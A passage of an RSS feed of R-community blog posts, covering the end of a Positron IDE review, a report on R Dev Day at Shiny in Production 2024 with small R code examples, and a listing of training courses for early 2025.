&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/source_control.png" alt="Git window in Positron." style="display: block; margin: auto;" /&gt;
&lt;p&gt;As well as Positron’s built-in Git support, there are extensions too.
There’s a GitLab workflow extension for viewing merge requests, issues
and more, and about a million extensions for GitHub. I’m particularly
enjoying the Git Graph extension, which allows me to view the branch
graph in a separate tab. Please enjoy this ridiculous example of a git
branch graph.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/git-graph.png" alt="Complex git graph with lots of branches." class="image-center" style="width: 250px"/&gt;
&lt;h3 id="data-explorer"&gt;Data explorer&lt;/h3&gt;
&lt;p&gt;Posit have pushed this element of Positron a lot and to be fair, it is
an upgrade on the RStudio data explorer. There aren’t too many
additional features compared to RStudio - it’s probably more of a win
for Python users, who won’t be used to a data explorer. In my opinion,
the welcome new additions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The column summary on the left-hand side, which makes for quicker
browsing of data.&lt;/li&gt;
&lt;li&gt;The UI design in general. For instance having filters as tabs across
the top instead of above their respective column makes so much sense.&lt;/li&gt;
&lt;li&gt;Multi column sorting (!!)&lt;/li&gt;
&lt;li&gt;Larger data sets load into the explorer view much, much quicker.&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/data-viewer.png" alt="Positron data viewer." style="display: block; margin: auto;" /&gt;
&lt;h3 id="debugging-and-testing"&gt;Debugging and testing&lt;/h3&gt;
&lt;p&gt;The interface for R package testing has greatly improved, in that there
now is one. You can view all tests from the “Testing” section of the
sidebar whilst being able to jump to and run any tests from this
section.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/testing.png" alt="Positron testing window." style="display: block; margin: auto;" /&gt;
&lt;p&gt;There is now a completely separate interface for debugging too, with
separate sections for the environment state and call stack. Too many
times have I mistaken my debug environment for my global in RStudio!
During Posit conf, it was announced that within debug mode users can now
jump to and from C code as well, though I haven’t tested this out yet.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/debug-layout.png" alt="Positron debug window." style="display: block; margin: auto;" /&gt;
&lt;h3 id="r-package-development"&gt;R-package development&lt;/h3&gt;
&lt;p&gt;For a more comprehensive analysis of full R package development see
&lt;a href="https://blog.stephenturner.us/p/r-package-development-in-positron" rel="external"&gt;this
blog&lt;/a&gt;
by Stephen Turner.&lt;/p&gt;
&lt;h3 id="whats-not-quite-there"&gt;What’s not quite there?&lt;/h3&gt;
&lt;p&gt;For all the good there are a few things that just aren’t quite there
yet:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;So far there’s no support for RStudio addins.&lt;/li&gt;
&lt;li&gt;Most of the functions that make calls to {rstudioapi} work
(e.g. those in {testthat}), but there are some that don’t.&lt;/li&gt;
&lt;li&gt;The big annoying one for me at the moment is that the console doesn’t
retain code formatting and colour for the results and code once the
code has been run. There is an issue about this and a fix is coming
apparently.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Positron is still a beta product, but I’m going to be switching from
RStudio for &lt;em&gt;most&lt;/em&gt; of my programming. I would, however, say to anyone
thinking of making the switch that it’s taken me a couple of weeks to get
used to the layout and I’m still not sure I have my settings nailed down.
But that will come in time.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-move-to-positron-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Dev Day @ SIP 2024</title><link>https://www.jumpingrivers.com/blog/r-dev-day-2024/</link><pubDate>Thu, 14 Nov 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-dev-day-2024/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-dev-day-2024/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-dev-day-2024/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-dev-day--sip-2024"&gt;R Dev Day @ SIP 2024&lt;/h1&gt;
&lt;p&gt;This year Shiny in Production hosted an &amp;ldquo;R Dev Day&amp;rdquo; split over the two days before the pre-conference workshops. R Dev Days are a new initiative of the &lt;a href="https://contributor.r-project.org/working-group" rel="external"&gt;R Contribution Working Group&lt;/a&gt;, providing an opportunity for R developers to get involved in contributing to the R Project. R Dev Day will be back at &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;SIP 2025&lt;/a&gt;, so read on to find out what participants got up to and consider coming along next year!&lt;/p&gt;
&lt;h2 id="translation"&gt;Translation&lt;/h2&gt;
&lt;p&gt;An R user&amp;rsquo;s local environment, or &lt;em&gt;locale&lt;/em&gt;, sets their preferred human language. If translations are available, R will display messages, errors and warnings in that language. So one important way that the community contributes to R is to develop and maintain these translations.&lt;/p&gt;
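&lt;p&gt;As a minimal sketch of this behaviour, the code below captures the same warning before and after switching the message language. It assumes R 4.2.0 or later (for &lt;code&gt;Sys.setLanguage()&lt;/code&gt;), a build of R with translation support, and that French translations are installed; the helper &lt;code&gt;warning_text()&lt;/code&gt; is a name made up for this illustration. If any of these assumptions fail, both messages will simply appear in English.&lt;/p&gt;

```r
# Hypothetical helper: capture the warning text produced by an invalid logarithm.
warning_text = function() {
  tryCatch(log(-1), warning = function(w) conditionMessage(w))
}

english = warning_text()

# Sys.setLanguage() (R 4.2.0 or later) returns the previous language setting.
previous = Sys.setLanguage("fr")
french = warning_text()

# Restore the original language so the rest of the session is unaffected.
Sys.setLanguage(previous)

print(c(english = english, french = french))
```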
&lt;p&gt;At the R Dev Day, Gabriela de Lima Marin learnt how to contribute translations via &lt;a href="https://translate.rx.studio/" rel="external"&gt;R&amp;rsquo;s Weblate&lt;/a&gt;, which provides a user-friendly browser interface for translation. In the first session, she worked in the conventional way, translating one string at a time. In the second session, she explored translating messages in bulk using machine translation. The second method was a little faster, but the automatic translations required careful review - sometimes they had the meaning completely wrong!&lt;/p&gt;
&lt;p&gt;Overall, Gabriela translated over 200 messages at the R Dev Day! If you want to start contributing translations, you can find links to resources on &lt;a href="https://github.com/r-devel/r-dev-day/issues/2" rel="external"&gt;issue 2&lt;/a&gt; of the r-dev-day repository.&lt;/p&gt;
&lt;h2 id="translation-dashboard"&gt;Translation dashboard&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://contributor.r-project.org/" rel="external"&gt;R Contributor site&lt;/a&gt; hosts a &lt;a href="https://contributor.r-project.org/translations-dashboard/" rel="external"&gt;translations dashboard&lt;/a&gt; to show the status of translations in the development version of R (&lt;em&gt;R-devel&lt;/em&gt;) and on Weblate. Contributors can update translations on Weblate at any time; these translations are then collated around once a quarter to update R-devel, which will become the next major/minor release of R, usually released in April. Mario Reiman, Md Mursalin Hossain Rabbi and Murad Khalilov reviewed the open issues on the &lt;a href="https://github.com/r-devel/translations-dashboard/issues" rel="external"&gt;translation dashboard GitHub repository&lt;/a&gt; and picked two to work on - &lt;a href="https://github.com/r-devel/translations-dashboard/issues/9" rel="external"&gt;#9&lt;/a&gt;: avoid using {stringr}, to reduce the number of dependencies required by the R scripts that are run using GitHub Actions to update the data sources, and &lt;a href="https://github.com/r-devel/translations-dashboard/issues/38" rel="external"&gt;#38&lt;/a&gt;: switch from using the {flexdashboard} package to using Quarto to create the dashboard. Good progress was made on both fronts during the R Dev Day and work will continue to integrate these updates.&lt;/p&gt;
&lt;p&gt;When Mario cloned the translations dashboard repository on Windows, he faced difficulties due to version-controlled files containing &lt;code&gt;?&lt;/code&gt; and &lt;code&gt;&amp;amp;&lt;/code&gt; characters. Investigating further, we discovered these were supplementary files from the R Markdown rendering that weren&amp;rsquo;t needed any more. This led to Heather Turner and Cam Race reviewing the GitHub Actions that rendered the dashboard and adapting them to remove old files from the repository before rebuilding. They did a wider review of the GitHub Actions and found several had stopped working, meaning the dashboards were not fully updating daily, as scheduled. Heather continued work on this on the train home from SIP 2024 and got them all working again by the end of the journey!&lt;/p&gt;
&lt;h2 id="bug-in-cairo-graphics-with-r"&gt;Bug in Cairo graphics with R&lt;/h2&gt;
&lt;p&gt;Bugs in base R are tracked on &lt;a href="https://bugs.r-project.org/" rel="external"&gt;R&amp;rsquo;s Bugzilla&lt;/a&gt;. There are many ways that contributors can help with reported bugs: reviewing the reports to assess if the issue is a valid bug that has not yet been fixed in R-devel; creating a simple reproducible example (or &lt;em&gt;reprex&lt;/em&gt;); debugging the R or underlying C code to analyse the root cause of the bug; discussing how to fix the bug, or proposing an update to the source code to fix a bug. For R Dev Days, a number of bug reports are selected where there is a clear next step for contributors to make.&lt;/p&gt;
&lt;p&gt;At R Dev Day @ SIP 2024, Ella Kaye and George Stagg looked at &lt;a href="https://bugs.r-project.org/show_bug.cgi?id=16721" rel="external"&gt;Bug 16721&lt;/a&gt;, which is an issue affecting Cairo graphics in R (&amp;lt; 4.5.0). In an image plot that is expected to be a full block of colour, a white stripe would appear, as in the example below:&lt;/p&gt;
&lt;img title = "An image plot ranging from 0 to 1 on the x axis and -1 to 1 on the y axis, that is almost entirely orange with a thin white vertical stripe near x = 0.9" src="ImageWithWhiteStripe.png" class="image-center" style="width: 330px;" /&gt;
&lt;p&gt;The Cairo device is implemented in the {grDevices} package, which is part of base R. Ella and George built R from source so they were able to debug both the R and C code that gets called in the reprex above. They had to troubleshoot some issues that cropped up when building R on Ella&amp;rsquo;s computer, including complications working with multiple versions of R. Sorting these issues took most of the first session, but Ella appreciated the opportunity to learn some best practices from George, as the more experienced developer. In the second session they were able to focus on the debugging. Following advice that had been given by R Core member Paul Murrell in advance of the R Dev Day, they tried &lt;em&gt;print debugging&lt;/em&gt;, i.e. adding a print statement to the source code to print out key information, while plotting a thin rectangle with &lt;code&gt;grid::grid.rect()&lt;/code&gt;. The hypothesis was that nothing would be drawn when the width was less than a pixel. They managed to create an example that plotted nothing in a Cairo graphics device, yet plotted a thin black rectangle in a Quartz device. They looked more closely at C code for the Quartz device and discovered it had a specific workaround with the comment:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;in the case of borderless rectangles snap them to pixels.&lt;br&gt;
this solves issues with image() without introducing other artifacts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So they worked on updating the C code for the Cairo device, to use the same workaround as the Quartz device. Rebuilding R with this change fixed the issue in both the original reprex and their simpler &lt;code&gt;grid.rect()&lt;/code&gt; example!&lt;/p&gt;
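&lt;p&gt;The code used on the day is not reproduced in this post, but a thin-rectangle test of this kind might look something like the sketch below. The canvas size, the rectangle width and the name &lt;code&gt;out_file&lt;/code&gt; are all assumptions chosen for illustration: on a 100 pixel wide canvas, a width of 0.001 npc is a tenth of a pixel. Whether anything is drawn in the resulting file will depend on the version of R and the graphics device used.&lt;/p&gt;

```r
library(grid)

# Hypothetical output file for the test image.
out_file = tempfile(fileext = ".png")

# Only attempt the plot if this build of R has cairo support.
if (capabilities("cairo")) {
  png(out_file, width = 100, height = 100, units = "px", type = "cairo")
  grid.newpage()
  # Borderless (col = NA) black rectangle, far narrower than one pixel.
  grid.rect(
    width = unit(0.001, "npc"),
    gp = gpar(fill = "black", col = NA)
  )
  dev.off()
}
```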
&lt;p&gt;In a plot twist, they discovered the Xlib device had different behaviour again, showing no issue with the original reprex, but failing on the &lt;code&gt;grid.rect()&lt;/code&gt; example. Digging into the code again, they found that Quartz &lt;em&gt;rounded&lt;/em&gt; values to whole pixels, while Xlib &lt;em&gt;truncated&lt;/em&gt; values. They shared their findings on Bugzilla at the end of the R Dev Day and have since had some feedback from Paul Murrell on the next steps to get a fix accepted into base R.&lt;/p&gt;
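&lt;p&gt;To see why rounding and truncating can give different results for a thin rectangle, consider the arithmetic sketch below. It is not the code from either device; the edge coordinates are made-up values for a rectangle that is 0.3 pixels wide.&lt;/p&gt;

```r
# Illustrative pixel coordinates for the left and right edges of a thin rectangle.
edges = c(left = 10.4, right = 10.7)

# Rounding snaps each edge to the nearest whole pixel.
rounded = round(edges)
# Truncation drops the fractional part of each edge.
truncated = trunc(edges)

# Width in whole pixels under each approach.
rounded_width = unname(rounded["right"] - rounded["left"])
truncated_width = unname(truncated["right"] - truncated["left"])

print(c(rounded = rounded_width, truncated = truncated_width))
```

&lt;p&gt;With these values the rounded edges end up one pixel apart, while the truncated edges coincide, leaving a rectangle of zero width.&lt;/p&gt;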
&lt;h2 id="r-dev-container"&gt;R Dev Container&lt;/h2&gt;
&lt;p&gt;As noted above, building R on your own computer can be a big timesink for contributors. An alternative (currently only recommended for contributions that don&amp;rsquo;t involve C code) is to use the &lt;a href="https://github.com/r-devel/r-dev-env" rel="external"&gt;R Dev Container&lt;/a&gt;: a development environment for R that can be launched in the browser using GitHub Codespaces or Gitpod. This has the pre-requisites for building R already installed and is isolated from the user&amp;rsquo;s computer, avoiding many of the issues of building R on your own machine. It comes with documentation and a few helpers, so you can launch the container, get a copy of the source code for R and build R in around half an hour.&lt;/p&gt;
&lt;p&gt;Although it was designed to be used in the browser, some contributors prefer to use the container on their own machine, to avoid using up their internet data or their free time/space allowance on GitHub Codespaces or Gitpod. Unfortunately, the Dev Container is currently built with a specific operating system and for a specific architecture, so it does not work well across platforms.&lt;/p&gt;
&lt;p&gt;At the R Dev Day, Seb Mellor looked into building the Docker container for arm64 architecture, so that it would work better on recent macOS computers. The steps for building a Docker container are specified in a Dockerfile. Previous work by others had found the existing Dockerfile would work on arm64 up until the step where it tried to install the &lt;code&gt;r-base-dev&lt;/code&gt; package from the Ubuntu repository. Seb tested the container at this point and confirmed you could still build R in the container, but it was missing the pre-installed version of R that is usually there. If we could build the container on an arm64 machine, then we could build the &lt;code&gt;r-base-dev&lt;/code&gt; package as part of the Docker build, but Seb noted arm64 machines are not available on GitHub Actions for non-Enterprise customers. So he investigated some alternatives with the conclusion that an arm64 dev container may be cross compiled with additional research, or emulated with a very long build time.&lt;/p&gt;
&lt;p&gt;When Seb reported back he said he found it odd that there wasn&amp;rsquo;t an arm64 build of the &lt;code&gt;r-base-dev&lt;/code&gt; package, so Heather did some further investigation and found that we could get it from a Personal Package Archive (PPA) maintained by Michael Rutter, who compiles the packages for the official Ubuntu repository. This should solve a large part of the problem, so we have a strong lead going forward - this work is being tracked on issue &lt;a href="https://github.com/r-devel/r-dev-day/issues/2" rel="external"&gt;#112&lt;/a&gt; of the r-dev-env GitHub repository.&lt;/p&gt;
&lt;h2 id="r-dev-guide"&gt;R Dev Guide&lt;/h2&gt;
&lt;p&gt;Even from this handful of tasks that were selected for R Dev Day @ SIP 2024, you can see there is much to learn about contributing to R. One of the first initiatives of the R Contribution Working Group was to create an &lt;a href="https://contributor.r-project.org/rdevguide/" rel="external"&gt;R Development Guide&lt;/a&gt; (or &amp;ldquo;R Dev Guide&amp;rdquo; for short), to document some of the processes. Like the translations dashboard and the R Dev Container, this is a resource maintained by the contributor community.&lt;/p&gt;
&lt;p&gt;At the R Dev Day, Cam Race worked on two issues related to the R Dev Guide. In both cases, some initial work had been done by others at a previous R Dev Day, so his task was to review their contribution and continue where they left off. The first issue was to add a new section on websites relevant to R contributors, particularly those under the r-project.org domain. The second issue was to improve the documentation on how to contribute to R&amp;rsquo;s documentation, including adding some examples of successfully closed bugs. Cam opened two pull requests to propose his changes (&lt;a href="https://github.com/r-devel/rdevguide/pull/186" rel="external"&gt;#186&lt;/a&gt; and &lt;a href="https://github.com/r-devel/rdevguide/pull/188" rel="external"&gt;#188&lt;/a&gt; respectively), along with another pull request to fix minor issues such as broken links.&lt;/p&gt;
&lt;h2 id="getting-involved"&gt;Getting involved&lt;/h2&gt;
&lt;p&gt;As this post shows, there is a large range of activities to get involved in at an R Dev Day, suiting different levels of skills and experience. &lt;strong&gt;R Dev Day @ SIP 2025&lt;/strong&gt; will take place on the afternoon of Tuesday 8 October and the morning of Wednesday 9 October. We&amp;rsquo;d love for next year&amp;rsquo;s R Dev Day to be bigger and better - if you&amp;rsquo;re inspired to come along, the &lt;a href="https://pretix.eu/r-contributors/r-dev-day-sip-2025/" rel="external"&gt;registration form&lt;/a&gt; is open already!&lt;/p&gt;
&lt;p&gt;Meanwhile, for news of other R contributor events and links to resources to help you get started with contributing to base R at any time, head to the R Contributor Site: &lt;a href="https://contributor.r-project.org/" rel="external"&gt;contributor.r-project.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-dev-day-2024/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training Lineup for 2025: January-June</title><link>https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Thu, 07 Nov 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;All of our public training courses for the first half of 2025 are now open for registration! Head over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public courses page&lt;/a&gt; on our website to book in and start building your programming skills in the new year! Below is a list of all of our upcoming courses with a description, bookable dates, course level and a link to the course webpage to find out more!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-training-lineup-for-2025"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;p&gt;There is still time to book yourself on to the final public courses of 2024. We are running &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto" rel="external"&gt;Reporting with Quarto&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;, both on 18th November.&lt;/p&gt;
&lt;h3 id="r-stats-and-programming"&gt;R Stats and Programming&lt;/h3&gt;
&lt;h4 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th January 2025 &amp;amp; 22nd April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd January 2025 &amp;amp; 29th April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;This course&lt;/a&gt; will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h4 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 29th January 2025 &amp;amp; 20th May 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 12th February 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad practices. In &lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;this course&lt;/a&gt; we motivate the importance of good practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 5th February 2025 &amp;amp; 10th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;This course&lt;/a&gt; will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2025 &amp;amp; 3rd June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypothesis tests, before moving onto ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;img src="collaboration.png" alt="Data and graphs." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="machine-learning-and-bayesian-techniques"&gt;Machine Learning and Bayesian Techniques&lt;/h3&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2025 &amp;amp; 17th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. We will be &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;specifically focusing on&lt;/a&gt; how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2025 &amp;amp; 24th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A course that builds on the material covered in our Machine Learning with Tidymodels course. We take a look at how we can fit linear discriminant analysis (LDA) models using {discrim}, assessing model reliability using V-fold cross validation, pre-processing, tree-based models &amp;amp; more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;this course&lt;/a&gt; is certainly for you!&lt;/p&gt;
&lt;img src="spacesuit-computer.png" alt="Spacesuit and computer with graphs and numbers on." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 13th January 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences. &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;This course&lt;/a&gt; will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;img src="data-storage.png" alt="Servers linked up to cloud." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="automatic-reporting"&gt;Automatic Reporting&lt;/h3&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 25th March 2025 &amp;amp; 24th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;this course&lt;/a&gt; is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;img src="reporting.png" alt="Spacesuit working on laptop in space." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2025 &amp;amp; 13th May 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2025 &amp;amp; 3rd June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
